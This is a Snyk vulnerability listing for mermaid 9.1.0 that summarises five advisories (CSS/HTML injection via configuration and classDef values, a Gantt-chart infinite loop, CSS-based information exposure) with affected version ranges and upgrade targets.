mermaid 9.1.0

Direct Vulnerabilities

Known vulnerabilities in the mermaid package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free

Vulnerability	Vulnerable Version
M Arbitrary Code Injection mermaid is a package for generation of diagrams and flowcharts from text in a similar manner as markdown. Affected versions of this package are vulnerable to Arbitrary Code Injection due to improper sanitization of configuration options such as `fontFamily`, `themeCSS`, and `altFontFamily`. An attacker can inject arbitrary CSS that escapes diagram scoping and affects the entire page, potentially leading to page defacement or exfiltration of DOM attributes by crafting malicious configuration values. How to fix Arbitrary Code Injection? Upgrade `mermaid` to version 10.9.6, 11.15.0 or higher.	<10.9.6>=11.0.0-alpha.1 <11.15.0
M Arbitrary Code Injection mermaid is a package for generation of diagrams and flowcharts from text in a similar manner as markdown. Affected versions of this package are vulnerable to Arbitrary Code Injection due to improper sanitization of the `classDef` function in state diagrams. An attacker can inject arbitrary HTML into the rendered output by crafting malicious diagram definitions, potentially leading to DOM manipulation and content spoofing. How to fix Arbitrary Code Injection? Upgrade `mermaid` to version 10.9.6, 11.15.0 or higher.	>=0.0.0 <10.9.6>=11.0.0-alpha.1 <11.15.0
M Arbitrary Code Injection mermaid is a package for generation of diagrams and flowcharts from text in a similar manner as markdown. Affected versions of this package are vulnerable to Arbitrary Code Injection due to improper sanitization of input passed to the `addStyleClass` function. An attacker can inject arbitrary CSS into the rendered page by crafting malicious `classDef` values, potentially leading to page defacement, user tracking through external resource loading, or exfiltration of DOM attributes using advanced CSS selectors. How to fix Arbitrary Code Injection? Upgrade `mermaid` to version 10.9.6, 11.15.0 or higher.	<10.9.6>=11.0.0-alpha.1 <11.15.0
M Infinite loop mermaid is a package for generation of diagrams and flowcharts from text in a similar manner as markdown. Affected versions of this package are vulnerable to Infinite loop in the rendering process of Gantt charts when the `excludes` attribute is set to exclude all dates. An attacker can cause the application to enter an infinite loop by supplying a crafted chart configuration that excludes every day of the week. How to fix Infinite loop? Upgrade `mermaid` to version 10.9.6, 11.15.0 or higher.	<10.9.6>=11.0.0-alpha.1 <11.15.0
M Information Exposure mermaid is a package for generation of diagrams and flowcharts from text in a similar manner as markdown. Affected versions of this package are vulnerable to Information Exposure by injecting arbitrary CSS into the generated graph. Exploiting this vulnerability allows the attacker to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted CSS selectors. How to fix Information Exposure? Upgrade `mermaid` to version 9.1.3 or higher.	>=8.0.0 <9.1.3

Vulnerability

Vulnerable Version

Arbitrary Code Injection